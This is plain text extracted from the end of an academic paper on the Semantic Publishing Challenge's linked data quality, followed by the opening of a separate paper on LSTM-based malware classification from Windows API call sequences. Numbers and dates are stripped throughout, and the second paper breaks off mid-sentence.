evaluation setup assesses can be connected to the general quality dimensions (accessibility, intrinsic, contextual and representational) and certain of their corresponding metrics, as they are identified by zaveri et al. ( ). moreover, few other quality dimensions’ metrics that are not covered by the challenge’s evaluation are assessed in the frame of this review. note that some metrics are applicable for all tasks, whereas others are only for a certain task. accessibility dimensions the accessibility dimensions involve aspects related to the linked data access, authenticity and retrieval (zaveri et al., ). our challenge required participants to make their data available, forcing this way the solutions to cover the availability dimension. making the data available as an rdf dump was the minimum requirement set by the challenge, covering this way the accessibility of the rdf dumps metric. participants were also encouraged to publish their data via other triple pattern fragment (tpf) interfaces, such as sparql endpoints, but assessing its availability was not part of the challenge’s evaluation. moreover, participants were encouraged to publish their data using a certain license, without being a requirement though, boosting this way the licensing dimension (the corresponding detailed discussion is available in ‘license’). while the aforementioned referred to all challenge’s tasks, the interlinking dimension was only promoted by task , which, after all, is its actual goal. overall, even though the submitted solutions only made their datasets available as rdf dumps and did not specify the license, the challenge achieved to enable solutions to achieve the minimum requirement of making the produced datasets accessible. it is evident that, if the challenge had turned high values w.r.t. each of the aforementioned metrics mandatory, the produced dataset accessibility would have been increased. intrinsic dimensions according to zaveri et al. ( ), the intrinsic dimensions focus on whether the information correctly, compactly and completely represents the real world and is logically consistent in itself. as the semantic publishing challenge requires sparql queries to be executed against the linked data produced by the different solutions, the syntactic validity of the dataset is a prerequisite, boosting this way the metrics for syntax error free documents and the absence of malformed datatypes. while our challenge evaluation covers well the syntactic validity, the semantic accuracy is not evaluated. nevertheless, the metric which is related to the misuse of properties is discussed and assessed in a qualitative way in the ‘annotations’ section of this paper, but it is not assessed quantitatively. similarly, the population completeness, i.e., the percentage of real-world objects of a particular type that are represented in a dataset, is indirectly evaluated on the side. namely, it is not thoroughly assessed if all real-world entities appear, but to successfully answer the evaluation queries, the population completeness is prerequisite. moreover, a comparative evaluation of the population completeness is performed in this work (see more detailed discussion at the ‘coverage’ section and tables , ). last, even though the solutions’ dataset consistency dimension could have been evaluated and shed more light to their quality, it was not done by any of the challenge’s series so far. all in all, as the challenge was not focused on dimou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. assessing the dataset quality, certain metrics of the intrinsic dimension were not covered intentionally, others were indirectly assessed, while a few others were only discussed in this paper. nevertheless, if it had been intended, the challenge could have covered even more metrics of the intrinsic dimension and could have reinforced the datasets quality even more. contextual dimensions the contextual dimensions highly depend on the context of the task at hand. in the case of relevancy dimension, the semantic publishing challenge did not perform any relevant evaluation. nevertheless, in this paper the coverage metric is addressed. to be more precise, in the ‘coverage’ section, the coverage is thoroughly discussed. the semantic publishing challenge does contribute to the timeliness dimension. to be more precise, thanks to its continuity, it is assured that at least every year the challenge is organized, a new dataset for the underlying ceur-ws.org data is generated, boosting the freshness metric. in particular the final extraction has to be made from the evaluation dataset published a few days before the final submission deadline. as a conclusion, the challenge succeeded in indirectly promoting the coverage and timeliness dimensions; however, there is potential for other dimensions to be covered as well. representational dimension the representational dimension captures aspects related to the data design (zaveri et al., ). as far as the interoperability dimension is concerned, the semantic publishing challenge promotes the reuse of existing terms and vocabularies and, as shown in table and discussed in the ‘annotations’ section, the semantic publishing challenge achieves its goal of promoting the re-use of existing vocabularies, even though the corresponding metric is not evaluated automatically. moreover, thanks to task , the semantic publishing challenge also promotes the re-use of existing terms. even though it failed to attract participation, it is proven that such a task contributes into increasing the overall dataset quality. thus, the challenge enables the produced datasets to cover even the representational quality dimension. conclusions one of the objectives of the semantic publishing challenge is to produce linked data that contributes to improving scholarly communication. nevertheless, the lessons learned from organizing this challenge are not only applicable in the case of a challenge on semantic publishing but in the case of other challenges too. therefore, this work shed light not only on the three editions of this challenge organized by ourselves and distilled lessons learned from our experience, but we have also validated them against other challenges and concluded on general best practices for organizing such challenges. in a nutshell, continuity both in terms of the dataset and in terms of the tasks is important. nevertheless, tasks should remain distinct, but they should refer to the same training and evaluation dataset, while participants’ feedback should be taken into consideration to define or refine the tasks. regarding the output, the larger the evaluation dataset is and the less overlapping with the training dataset, the best it is for verifying high coverage. the sooner the evaluation dimou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. tool is made available, the better it is for the quality of the final output. finally, it is a critical incentive for the participants to know how their output is intended to be reused. besides the challenge’s organizational aspects, we looked for evidence from the solutions proposed by the participants. therefore, we analyzed them, reported our observations and came up with different conclusions related to linked data publishing practices followed by different participants. there are several positive aspects, among them the high participation and the quality of the produced results. this work allowed us to share those observations on semantifying scholarly data, using different ontological models, refining and extending existing datasets. even though the semantic publishing challenge focuses on scholarly data, the conclusions we draw based on our analysis are of interest for the entire community that publishes linked data. the possibility of sharing knowledge and solutions among participants was another key factor of the semantic publishing challenge. in a nutshell, most solutions relied on generic and open-sourced tools, which allows and enables their reuse for corresponding cases. solutions, and thus the tools that produce them, have improved from one edition to the other. even though different methodologies were followed, there are certain prevailing approaches—based on structure/layout or on linguistics—which were instantiated in different ways. despite the fact that tools diverge, the produced data model and final annotations converge, as solutions become more mature from one edition to the other, while well-known vocabularies are reused. last, we assessed how the challenge’s organization reflects on the submitted solutions’ output, namely how the challenge’s organization affects the datasets’ quality. we showed that indeed the challenge’s organization may have a positive impact on increasing the quality of the linked data produced. additional information and declarations funding research activities described in this paper were funded by ghent university, iminds, the institute for the promotion of innovation by science and technology in flanders (iwt), the research foundation—flanders (fwo) and the european union under grant agreement no. (openaire ) and others. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: ghent university, imec. flanders innovation & entrepreneurship (vlaio). european union: . competing interests the authors declare there are no competing interests. christoph lange is an employee of enterprise information systems. anastasia dimou and erik mannens are employees of imec. dimou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. author contributions • anastasia dimou, sahar vahdati, angelo di iorio and christoph lange conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • ruben verborgh wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. • erik mannens reviewed drafts of the paper. data availability the following information was supplied regarding data availability: ( ) sempub : https://github.com/ceurws/lod/wiki/sempub ( ) sempub : https://github.com/ceurws/lod/wiki/sempub ( ) sempub : http://challenges. .eswc-conferences.org/index.php/sempub. references ahmad r, afzal mt, qadir ma. . information extraction for pdf sources based on rule-based system using integrated formats. in: sack h, dietze s, tordai a, lange c, eds. the semantic web: eswc challenges, anissaras, crete, greece, may –june , , revised selected papers. communications in computer and information science, no. , cham: springer international publishing. bertin m, atanassova i. . extraction and characterization of citations in scientific papers. in: presutti v, stankovic m, cambria e, cantador i, di iorio a, di noia t, lange c, reforgiato recupero d, tordai a, eds. semantic web evaluation challenge: semwebeval at eswc , anissaras, crete, greece, may – , , revised selected papers. communications in computer and information science, no. . cham: springer international publishing, – . catapano t. . taxpub: an extension of the nlm/ncbi journal publishing dtd for taxonomic descriptions. journal article tag suite conference (jats-con) proceedings . clough p, sanderson m. . evaluating the performance of information retrieval systems using test collections. information research ( ): – . d’aquin m, drachsler h, dietze s, herder e, parodi e, guy m. . lessons learnt from linkedup—linking web data for education. in: multidisciplinary academic conference on education, teaching and e-learning. – . di iorio a, lange c, dimou a, vahdati s. . semantic publishing challenge— assessing the quality of scientific output by information extraction and interlinking. in: gandon f, cabrio e, stankovic m, zimmermann a, eds. semantic web evaluation challenges, portorož, slovenia, may –june , , revised selected papers. commu- nications in computer and information science, no. . cham: springer international publishing, – . dimou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/ceurws/lod/wiki/sempub https://github.com/ceurws/lod/wiki/sempub http://challenges. .eswc-conferences.org/index.php/sempub http://dx.doi.org/ . /peerj-cs. di noia t, cantador i, ostuni vc. . linked open data-enabled recommender systems: eswc challenge on book recommendation. in: presutti v, stankovic m, cambria e, cantador i, di iorio a, di noia t, lange c, reforgiato recupero d, tordai a, eds. semantic web evaluation challenge: semwebeval at eswc , anissaras, crete, greece, may – , , revised selected papers. communications in computer and information science, no. , cham: springer international publishing, – . dimou a, di iorio a, lange c, vahdati s. . semantic publishing challenge— assessing quality scientific output its ecosystem. in: sack h, dietze s, tordai a, lange c, eds. the semantic web: eswc challenges, anissaras, crete, greece, may – june , , revised selected papers. communications in computer and information science, no. . cham: springer international publishing. dimou a, vander sande m, colpaert p, de vocht l, verborgh r, mannens e, van de walle r. . extraction and semantic annotation of workshop proceedings in html using rml. in: presutti v, stankovic m, cambria e, cantador i, di iorio a, di noia t, lange c, reforgiato recupero d, tordai a, eds. semantic web evaluation challenge: semwebeval at eswc , anissaras, crete, greece, may – , , revised selected papers. communications in computer and information science, no. . cham: springer international publishing, – . freitas a, unger c. . the schema-agnostic queries (saq- ) semantic web challenge: task description. in: gandon f, cabrio e, stankovic m, zimmermann a, eds. semantic web evaluation challenges: second semwebeval challenge at eswc , portorož, slovenia, may –june , , revised selected papers. communications in computer and information science, no. . cham: springer international publishing, – . heyvaert p, dimou a, verborgh r, mannens e, van de walle r. . semantically annotating ceur-ws workshop proceedings with rml. in: gandon f, cabrio e, stankovic m, zimmermann a, eds. semantic web evaluation challenges: second semwebeval challenge at eswc , portorož, slovenia, may –june , , revised selected papers. communications in computer and information science, no. . cham: springer international publishing, – . klampfl s, kern r. . machine learning techniques for automatically extracting contextual information from scientific publications. in: gandon f, cabrio e, stankovic m, zimmermann a, eds. semantic web evaluation challenges: second semwebeval challenge at eswc , portorož, slovenia, may –june , , revised selected papers. communications in computer and information science, no. . cham: springer international publishing, – . klampfl s, kern r. . reconstructing the logical structure of a scientific publication using machine learning. in: sack h, dietze s, tordai a, lange c, eds. the semantic web: eswc challenges, anissaras, crete, greece, may –june , , revised selected papers. communications in computer and information science, no. . cham: springer international publishing. dimou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. kolchin m, cherny e, kozlov f, shipilo a, kovriguina l. . ceur-ws-lod: conversion of ceur-ws workshops to linked data. in: gandon f, cabrio e, stankovic m, zimmermann a, eds. semantic web evaluation challenges: second semwebeval challenge at eswc , portorož, slovenia, may –june , , revised selected papers. communications in computer and information science, no. . cham: springer international publishing, – . kolchin m, kozlov f. . a template-based information extraction from web sites with unstable markup. in: presutti v, stankovic m, cambria e, cantador i, di iorio a, di noia t, lange c, reforgiato recupero d, tordai a, eds. semantic web evaluation challenge: semwebeval at eswc , anissaras, crete, greece, may – , , revised selected papers. communications in computer and information science, no. . cham: springer international publishing, – . kovriguina l, shipilo a, kozlov f, kolchin m, cherny e. . metadata extraction from conference proceedings using template-based approach. in: gandon f, cabrio e, stankovic m, zimmermann a, eds. semantic web evaluation challenges: second semwebeval challenge at eswc , portorož, slovenia, may –june , , revised selected papers. communications in computer and information science, no. . cham: springer international publishing, – . lange c, di iorio a. . semantic publishing challenge—assessing the quality of scientific output. in: presutti v, stankovic m, cambria e, cantador i, di iorio a, di noia t, lange c, reforgiato recupero d, tordai a, eds. semantic web evaluation challenge: semwebeval at eswc , anissaras, crete, greece, may – , , revised selected papers. communications in computer and information science, no. . cham: springer international publishing, – . lopez v, unger c, cimiano p, motta e. . evaluating question answering over linked data. web semantics: science services and agents on the world wide web : – doi . /j.websem. . . . milicka m, burget r. . information extraction from web sources based on multi- aspect content analysis. in: gandon f, cabrio e, stankovic m, zimmermann a, eds. semantic web evaluation challenges: second semwebeval challenge at eswc , portorož, slovenia, may –june , , revised selected papers. communications in computer and information science, no. . cham: springer international publishing, – . miller hg, mork p. . from data to decisions: a value chain for big data. it profes- sional ( ): – doi . /mitp. . . nuzzolese ag, gentile al, presutti v, gangemi a, garigliotti d, navigli r. . open knowledge extraction challenge. in: gandon f, cabrio e, stankovic m, zimmermann a, eds. semantic web evaluation challenges: second semwebeval challenge at eswc , portorož, slovenia, may –june , , revised selected papers. communi- cations in computer and information science, no. . cham: springer international publishing, – . nuzzolese ag, peroni s, recupero dr. . acm: article content miner for assessing the quality of scientific output. in: sack h, dietze s, tordai a, lange c, eds. the dimou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.websem. . . http://dx.doi.org/ . /mitp. . http://dx.doi.org/ . /peerj-cs. semantic web: eswc challenges, anissaras, crete, greece, may –june , , revised selected papers. communications in computer and information science, no, . cham: springer international publishing. nuzzolese ag, peroni s, reforgiato recupero d. . macja: metadata and citations jailbreaker. in: gandon f, cabrio e, stankovic m, zimmermann a, eds. semantic web evaluation challenges: second semwebeval challenge at eswc , portorož, slovenia, may –june , , revised selected papers. communications in computer and information science, no. . cham: springer international publishing, – . ramesh sh, dhar a, kumar rr, anjaly v, sarath k, pearce j, sundaresan k. . automatically identify and label sections in scientific journals using conditional random fields. in: sack h, dietze s, tordai a, lange c, eds. the semantic web: eswc challenges, anissaras, crete, greece, may –june , , revised selected papers. communications in computer and information science, no. . cham: springer international publishing. reforgiato recupero d, cambria e. . eswc’ challenge on concept-level sentiment analysis. in: presutti v, stankovic m, cambria e, cantador i, di iorio a, di noia t, lange c, reforgiato recupero d, tordai a, eds. semantic web evaluation challenge: semwebeval at eswc , anissaras, crete, greece, may – , , revised selected papers. communications in computer and information science, no. . cham: springer international publishing, – . reforgiato recupero d, dragoni m, presutti v. . eswc challenge on concept- level sentiment analysis. in: gandon f, cabrio e, stankovic m, zimmermann a, eds. semantic web evaluation challenges: second semwebeval challenge at eswc , portorož, slovenia, may –june , , revised selected papers. communications in computer and information science, no. . cham: springer international publishing, – . ronzano f, del bosque gc, saggion h. . semantify ceur-ws proceedings: towards the automatic generation of highly descriptive scholarly publishing linked datasets. in: presutti v, stankovic m, cambria e, cantador i, di iorio a, di noia t, lange c, reforgiato recupero d, tordai a, eds. semantic web evaluation challenge: semwebeval at eswc , anissaras, crete, greece, may – , , revised selected papers. communications in computer and information science, no. . cham: springer international publishing, – . ronzano f, fisas b, del bosque gc, saggion h. . on the automated generation of scholarly publishing linked datasets: the case of ceur-ws proceedings. in: gandon f, cabrio e, stankovic m, zimmermann a, eds. semantic web evaluation challenges: second semwebeval challenge at eswc , portorož, slovenia, may –june , , revised selected papers. communications in computer and information science, no. . cham: springer international publishing, – . sateli b, witte r. . automatic construction of a semantic knowledge base from ceur workshop proceedings. in: gandon f, cabrio e, stankovic m, zimmermann a sack h, dietze s, tordai a, lange c, eds. semantic web evaluation challenges: second semwebeval challenge at eswc , portorož, slovenia, may –june , , dimou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. revised selected papers. communications in computer and information science, no. . cham: springer international publishing, – . sateli b, witte r. . an automatic workflow for the formalization of scholarly articles’ structural and semantic elements. in: sack h, dietze s, tordai a, lange c, eds. the semantic web: eswc challenges, anissaras, crete, greece, may –june , , revised selected papers. communications in computer and information science, no. . cham: springer international publishing. schmachtenberg m, bizer c, paulheim h. . adoption of the linked data best practices in different topical domains. in: mika p, tudorache t, bernstein a, welty c, knoblock c, vrandečić d, groth p, noy n, janowicz k, goble c, eds. the semantic web—iswc : th international semantic web conference, riva del garda, italy, october – , . proceedings, part i. cham: springer international publishing, – . shotton d. . semantic publishing: the coming revolution in scientific journal publishing. learned publishing ( ): – doi . / . tkaczyk d, bolikowski Ł. . extracting contextual information from scientific literature using cermine system. in: gandon f, cabrio e, stankovic m, zim- mermann a, eds. semantic web evaluation challenges: second semwebeval challenge at eswc , portorož, slovenia, may –june , , revised selected papers. communications in computer and information science, no. . cham: springer international publishing, – . unger c, forascu c, lopez v, ngomo a-cn, cabrio e, cimiano p, walter s. . question answering over linked data (qald- ). in: clef working notes.. vahdati s, dimou a, lange c, di iorio a. . semantic publishing challenge: bootstrapping a value chain for scientific data. in: gonzalez-beltran a, osborne f, peroni s, eds. semantics, analytics, visualisation: enhancing scholarly data. lecture notes in computer science. heidelberg: springer. williams jd, raux a, henderson m. . the dialog state tracking challenge series: a review. dialoge & discourse ( ): – doi . /dad. . . zaveri a, rula a, maurino a, pietrobon r, lehmann j, auer s. . quality assessment for linked data: a survey. semantic web journal ( ): – . dimou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / http://dx.doi.org/ . /dad. . http://dx.doi.org/ . /peerj-cs. submitted april accepted july published july corresponding author ferhat ozgur catak, ferhat.o.catak@ntnu.no, ozgur.catak@tubitak.gov.tr academic editor lerina aversano additional information and declarations can be found on page doi . /peerj-cs. copyright catak et al. distributed under creative commons cc-by . open access deep learning based sequential model for malware analysis using windows exe api calls ferhat ozgur catak , , ahmet faruk yazı , ogerta elezaj and javed ahmed department of information security and communication technology, ntnu norwegian university of science and technology, gjøvik, norway cyber security engineering, istanbul sehir university, istanbul, turkey tubitak bilgem cyber security institute, kocaeli, turkey abstract malware development has seen diversity in terms of architecture and features. this advancement in the competencies of malware poses a severe threat and opens new research dimensions in malware detection. this study is focused on metamorphic malware, which is the most advanced member of the malware family. it is quite impossible for anti-virus applications using traditional signature-based methods to detect metamorphic malware, which makes it difficult to classify this type of malware accordingly. recent research literature about malware detection and classification discusses this issue related to malware behavior. the main goal of this paper is to develop a classification method according to malware types by taking into consideration the behavior of malware. we started this research by developing a new dataset containing api calls made on the windows operating system, which represents the behavior of malicious software. the types of malicious malware included in the dataset are adware, backdoor, downloader, dropper, spyware, trojan, virus, and worm. the classification method used in this study is lstm (long short-term memory), which is a widely used classification method in sequential data. the results obtained by the classifier demonstrate accuracy up to % with . $f_ $-score, which is quite satisfactory. we also run our experiments with binary and multi-class malware datasets to show the classification performance of the lstm model. another significant contribution of this research paper is the development of a new dataset for windows operating systems based on api calls. to the best of our knowledge, there is no such dataset available before our research. the availability of our dataset on github facilitates the research community in the domain of malware detection to benefit and make a further contribution to this domain. subjects artificial intelligence, data mining and machine learning, security and privacy keywords malware analysis, sequential models, network security, long-short-term memory, malware dataset introduction malicious software, commonly known as malware, is any software intentionally designed to cause damage to computer systems and compromise user security. an application or code is considered malware if it secretly acts against the interests of the computer user and performs malicious activities. malware targets various platforms such as servers, personal how to cite this article catak fo, yazı af, elezaj o, ahmed j. . deep learning based sequential model for malware analysis using windows exe api calls. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:ferhat.o.catak@ntnu.no mailto:ozgur.catak@tubitak.gov.tr https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. computers, mobile phones, and cameras to gain unauthorized access, steal personal data, and disrupt the normal function of the system. malware has been notorious for its malicious activities and attack for decades. malware development has become a serious activity lately as the number of target platforms increases day by day, which significantly raises the importance of developing adequate techniques to detect them. dynamic analysis of malware in different platforms is an evolving and challenging task. according to recent statistics, million new malware has been infecting systems in the first months of (https://www.mcafee.com/enterprise/en-us/assets/reports/rp-quarterly-threats-jun- .pdf). this is evidence that malware is a significant threat in the systems and most of the time they are surpassing the capacities of malware analysts. accordingly, great efforts are needed to protect against malware attacks. one approach to deal with malware protection problem is by identifying the malicious software and evaluating its behavior. usually, this problem is solved through the analysis of malware behavior. this field closely follows the model of malicious software family, which also reflects the pattern of malicious behavior. there are very few studies that have demonstrated the methods of classification according to the malware families. proper malware labeling is a challenging issue in this domain. an anti-virus application can detect malware as a trojan, whereas, the same malware is labeled as a worm by another anti-virus application. with the advent of sophisticated malware framework, it is difficult to handle these problems. the main practical challenge faced by researchers is that malware has achieved a very complicated level of competence and effectiveness. this allows for constant change of the code signatures (rad, masrom & ibrahim, ). consequently, anti-virus applications that use conventional signature-based detection methods can not detect such malware. although a metamorphic malware that manifests itself with different code sequences in different environments, it must adopt the same behavior in all settings. since they developed this malicious software to conduct a specific malicious activity, using this information, nearly all the methods used for the detection and classification of metamorphic malware tackle the behavioral characteristic and not the malware’s structural features. data such as windows api calls, dns resolution, registry read/write operations are used in such methods to reflect malicious software behavior. all operating system api calls made to act by any software show the overall of this program. whether this program is alware or not can be learned by examining these actions in-depth. if it is malware, then what is its malware family. the malware-made operating system api call is a data attribute, and the sequence in which those api calls are generated is also critical the malware family performing specific api calls is a order that represents a behavior. one of the deep learning methods lstm (long-short term memory) has been commonly used in the processing of such time-sequential data (shamshirband, rabczuk & chau, ). our research is based on the analysis of api calls made by malware on the windows operating system. we analyze the api calls made by different types of malware on the system to build a collection of malware-based api calls. this dataset the development of a method that can be useful for the identification of malware based on its behavior. we also construct malware detection models based on this dataset using the lstm catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www.mcafee.com/enterprise/en-us/assets/reports/rp-quarterly-threats-jun- .pdf https://www.mcafee.com/enterprise/en-us/assets/reports/rp-quarterly-threats-jun- .pdf http://dx.doi.org/ . /peerj-cs. algorithm. this model classifies malware even though it has undergone structural changes, i.e., metamorphic malware, but in the operating system behaves like a type of malware (shamshirband & chronopoulos, ). in our previous work, (yazi, catak & gul, ) we applied a single layer lstm model to detect the malware classes. in another work, (Çatak & yazi, ), we describe our publicly available dataset in detail. our research has made the following major contribution: • a new dataset has been developed for malware detection on windows os. such a dataset does not exist in this domain. • malware was analyzed, and api calls were recorded by running in an isolated sandbox environment. • using the lstm algorithm, which is commonly used for text classification, malware detection was modeled as a text classification problem, and the detection model for the malware type was developed. the rest of the article is organized as follows: section briefly introduces some of the earlier works related to our problem. section describes windows api calls, sandbox environment and lstm algorithm. section shows our system model. section evaluates the proposed learning model. section concludes this paper. related work leder, steinbock & martini ( ) take into consideration structural changes of metamorphic malware. using vsa (value set analysis) method, detection processes were realized by removing the unchanging code structure found in malicious software, concluding that if there is no behavioral change in samples of metamorphic malware, the detection accuracy can be % (leder, steinbock & martini, ). although they examined the metamorphic software, and they only used the operating system processes. vinod et al. ( ) generated malware signatures by using windows api call sequences of metamorphic malware. the authors proposed a method for identifying and classifying malware families using these signatures. in this study, malicious software has been created from each ngvck, mpcgen, g , and il_smg families by using the vx heavens application. a dataset is created by using software emulators in order to obtain windows api call sequences. a dataset was created using this data. the accuracy achieved by the proposed method is %, %, %, and % for each family respectively (vinod et al., ). in this study, they obtained a high detection rate. however, because they use signatures, attackers can evade this detection method. qiao et al. ( ) developed a detection model by considering the behavior of malware. the api call sequences of malicious software on the windows operating system were obtained by using the cuckoo sandbox application. an analysis method has been developed by subtracting frequently used elements from these call sequences. the dataset used during the analyses contains malware, and the accuracy rate obtained is % (qiao et al., ). this work is very close to our study because they use api calls. however, since they do not model the api call sequences using a sequential method, they lose this information. catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. cheng, tsai & yang ( ) proposed an improved classification method of the behavior of malware is based on the information retrieval theory. windows api call sequences of malware obtained from honeypots with the help of the cuckoo sandbox application were preprocessed with the aim to represent malicious behavior. these documents were analyzed using the tf-idf weight, and the similarity measurement method was applied and in order to extract similarity characteristics of malicious software. a classification model was applied using these features, and the accuracy rate obtained was . % (cheng, tsai & yang, ). this work is alose close to our research because they use api calls. however, since they use tf-idf representations of calls, thus, they lose this information. mehra, jain & uppal ( ) proposed a method to classify malware where of alware were created using vx heaven. this malicious software has been extracted from the control flow and api request graphics using the gourmand feature selection algorithm to extract the required call properties. the proposed solution was implemented using the weka tool, whereas the classification was made using histogram and chi-square difference measurement formulas according to malware families. the classification accuracy varies between . % and . % for different families (mehra, jain & uppal, ). the number of malware contained in the dataset they use is relatively low. also, as in other studies, the api call sequence was not used. pirscoveanu et al. ( ) proposed a supervised algorithm for the classification of malware, such as the random forests algorithm. a total of , malware behaviors were collected using the cuckoo sandbox application. dns requests, accessed files, mutexes and, registry keys data were used for the classification of windows api calls. in addition, for the class labels of malicious software, the tags detected by avast application are over the results provided by virustotal service. trojan, potentially unwanted program, adware, and rootkit classes are used for classification. the weighted average area under curve (auc) value of the proposed method is . (pirscoveanu et al., ). the number of malware contained in the dataset they use is relatively high. again, the api call sequence was not used. ahmed, nepal & kim proposed a different approach malware detection. the detection of malicious software in this study is not based on the characteristics of malicious software on the effects; they have on the system. so, this method does not consider the structural and behavioral features of malware that are not considered in the detection process. still, it is limited only in the detection of abnormal behavior on the system in an ordinary situation. in this way, the authors claimed that advanced malicious software such as polymorphic, metamorphic, zero-day malware could be detected (ahmed, nepal & kim, ). sami et al. ( ) developed a framework based on mining api calls of pe for malware detections. the framework includes a pe analyzer, feature generator, feature selector, and a classifier. the authors generate a set of discriminative and domain interpretable features by reading api call sets in a collection of pe files. the classifier is trained using these features. the authors also created the first public dataset and improved existing mining api methods for malware detection. the accuracy and detection rate are improved by . % and . %, respectively. they also reduced the false alarm rate from . % to . % (sami et al., ). their approach again ignores the call sequences. catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. alazab, venkataraman & watters ( ) used a four-step methodology to extract api call features using a fully automated method. the authors disassemble, analyze, and extract the api function calls from the binary content of malware using static analysis tool idapro disassembler to classify program executable as malicious or benign. statistical tests were performed on extracted calls to determine the malware class based on suspicious behavior. the sample of malware used to conduct experimental tests. the authors generated six different categories of suspicious behavior of api call features based on these preliminary tests (alazab, venkataraman & watters, ). they applied static analysis techniques to detect malware. attackers use lots of evading techniques to bypass the analysts. peiravian & zhu ( ) framework that uses permissions and api calls to detect malicious android applications. the permissions are extracted from android applications and combined with the api calls to characterize each application either as malware or a benign. the inherent advantage of this framework is that it does not need to involve any dynamical tracing of the system calls ut only uses simple static analysis to find system functions involved in the application. experiments on real-world applications demonstrate the good performance of the framework for malware detection. furthermore, the framework can be generalized to all mobile applications for malware detection (peiravian & zhu, ). kolosnjaji et al. ( ) proposed an approach for malware classification that uses hybrid neural networks containing two convolutional layers and one recurrent layer o obtain the best features for classification. the authors optimal classification results by combining convolutional and recurrent layers in the neural network architecture. the approach outperformed not only other simpler neural architectures, but also most widely used hidden markov models and support vector machines (kolosnjaji et al., ). tian et al. ( ) proposed a scalable approach for malware vs. cleanware classification and malware family classification by investigating behavioral features using logs of various api calls. the authors used an automated tool running in a virtual environment to extract api call features from executable. later, pattern recognition algorithms and statistical methods are applied to differentiate between files. the research benefited from a dataset of , malware and cleanware to conduct experimental results. as per the result, this approach provides an accuracy of over % distinguishes malware from cleanware. the the classification of malware into different families (tian et al., ). alazab et al. ( ) proposed an approach to detect obfuscated malware by investigating the structural and behavioral features of api calls. the authors sed n-gram statistical analysis for api calls to analyze the similarities and distance of unknown malware with known behavior so that obfuscated malware could be detected efficiently. the authors used a dataset of malware and benign files to obtain experimental results. the approach demonstrates the accuracy of . % for the unigram model (alazab et al., ). as far as the suggested studies are examined, it is generally seen that sequential data loss methods such as tf-idf are preferred in the, or traditional machine learning methods are applied. although deep learning are not algorithmically new, they have become in the field of machine learning today, as they are easy to implement technologically and can be catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. trained with high-performance computation on systems such as gpus. for this reason, our study differs from other studies. preliminaries in this section, we briefly introduce windows api calls, cuckoo sandbox environment, virustotal service, and lstm algorithm used for our proposed malware classification model. windows api calls the windows api is an interface to application developers for developing applications on the windows operating system (hampton, baig & zeadally, ), designed mostly for the interaction between developers and the operating system. therefore, the operating system offers many services as api (https://docs.microsoft.com/en-us/windows/desktop/ apiindex/windows-api-list). an application developed to run on the windows operating system must call the interfaces presented as apis to use a function offered by the operating system. when an application is running on any operating system, it calls several api to complete an action. for example, when an application is requested to create a file, createfilea windows api (https://docs.microsoft.com/en-us/windows/desktop/api/fileapi/nf-fileapi-createfilea) is called. all api calls made by an application on the system can show the overall behavior of that application. therefore, api calls-based approach is widely applied in the dynamic malware analysis showing how malware can behave accurately. in this study, we extract windows api calls made by malware on the operating system, and generate a feature set. later, we use these features to train the classifier in order to detect malware. cuckoo sandbox the cuckoo sandbox app is a free and public sandbox application compatible with different operating systems (ali et al., ). a detailed analysis report of the files considered as suspicious (noor, abbas & shahid, ) can be produced as part of malware analyses using this application. with the cuckoo sandbox application, it is possible to prepare and run malicious software in an environment similar to a real working environment. it’s used to analyze files and collect comprehensive analysis results about the behavior and structural features of malicious software, such as api calls of malware, network traffic, memory dump, etc. the collected data are saved in a mongodb database in json format. cuckoo sandbox has two main components. the first component is the management machine used to start the analysis of malware, to store the results in the database, and to start the web service provided for the users. the other component is the analysis machine, virtual or physical machine, on which the malicious software is run, the actual analysis is performed, similar to the real working environment of the malicious software. in our study, the windows api call sequences representing the behavior of malware are collected using this application. catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://docs.microsoft.com/en-us/windows/desktop/apiindex/windows-api-list https://docs.microsoft.com/en-us/windows/desktop/apiindex/windows-api-list https://docs.microsoft.com/en-us/windows/desktop/api/fileapi/nf-fileapi-createfilea http://dx.doi.org/ . /peerj-cs. virustotal service virustotal is an online service that analyzes suspicious files or urls (shiel & o’shaughnessy, ). different antivirus application engines and website browsers execute suspicious files/urls for malicious activities. each antivirus application engine provides a detailed report, including registry access, dns resolutions, etc. virustotal service provides analysis reports from antivirus applications with an interface without any interpretation, because this service includes an extensive analysis archive, users can perform a new analysis as well as other analysis reports of other users. virustotal provides an interface for receiving services without using a web browser (virustotal public api v . ), giving the possibility to application developers to nalyze files and urls (martn, hernndez & de los santos, ) automatically. the body of the response is usually a json object containing the analysis results of antivirus application engines or web browsers separately. we have identified the families of malware by processing the results we obtain from the api, and we have assigned labels to each malware. long-short term memory lstm is a recurrent neural network (rnn) based deep learning method (muzaffar & afshari, ). lstm was developed because rnn not successful enough in long-term learning. lstm has an architecture that can remember and learn any long-term dependency at random intervals. it is considered a successful method to analyze data or events that have a specific 